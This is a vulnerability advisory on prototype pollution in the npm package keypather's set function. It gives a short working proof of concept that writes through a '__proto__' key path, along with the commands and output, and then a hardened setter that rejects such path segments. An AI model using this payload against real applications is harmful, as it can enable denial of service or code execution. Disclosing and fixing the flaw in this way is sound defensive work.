keypather

Vulnerability: Prototype Pollution
Severity: 7.3
Language: JavaScript
Registry: npm

✍️ Description

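The set function of the npm package keypather is vulnerable to Prototype Pollution: a key path that begins with __proto__ is written through to Object.prototype, so the property then appears on every object.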

🕵️‍♂️ Proof of Concept

Create the following JavaScript file:

// PoC.js
const set = require('keypather/set')
console.log("Before : " + {}.polluted);
set({}, '__proto__.polluted', true)
console.log("After : " + {}.polluted);

Run the following commands in the terminal:

npm i keypather # to install the package
node PoC.js # to run the PoC

The output shows that prototype pollution occurs:

Before : undefined
After : true

💥 Impact

Prototype Pollution can lead to information disclosure, denial of service (DoS) or remote code execution (RCE).
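
A key-path setter that refuses the __proto__ path used in the PoC above, shown as an added example; it is not keypather's code or its fix. The names safeSet and rejectsPollution are hypothetical, and the helper assumes plain dot-separated paths only:

```javascript
// Added example: a hardened dot-path setter (not keypather's code or patch).

// Path segments that reach an object's prototype chain.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'prototype', 'constructor']);

// Hypothetical helper: set `value` at the dot-separated `path` inside `target`.
// Assumption: plain dot paths only ("a.b.c"); bracket syntax is not parsed.
function safeSet(target, path, value) {
  if (typeof path !== 'string' || path.length === 0) {
    throw new TypeError('path must be a non-empty string');
  }
  const segments = path.split('.');
  // Validate the whole path before touching the target.
  for (const seg of segments) {
    if (seg === '' || FORBIDDEN_SEGMENTS.has(seg)) {
      throw new Error('rejected key path segment: ' + JSON.stringify(seg));
    }
  }
  let node = target;
  for (const seg of segments.slice(0, -1)) {
    // Descend only into own properties, so inherited objects are never modified.
    const own = Object.prototype.hasOwnProperty.call(node, seg);
    if (!own || node[seg] === null || typeof node[seg] !== 'object') {
      // Create the intermediate container as an own data property.
      Object.defineProperty(node, seg, {
        value: {}, writable: true, enumerable: true, configurable: true,
      });
    }
    node = node[seg];
  }
  // defineProperty creates an own property and never triggers inherited setters.
  Object.defineProperty(node, segments[segments.length - 1], {
    value, writable: true, enumerable: true, configurable: true,
  });
  return target;
}

// Returns true when safeSet refuses the path and Object.prototype is unchanged.
function rejectsPollution(path) {
  try {
    safeSet({}, path, true);
    return false;
  } catch (err) {
    return ({}).polluted === undefined;
  }
}
```

Callers that accept key paths from untrusted input can combine this kind of validation with target objects created via Object.create(null).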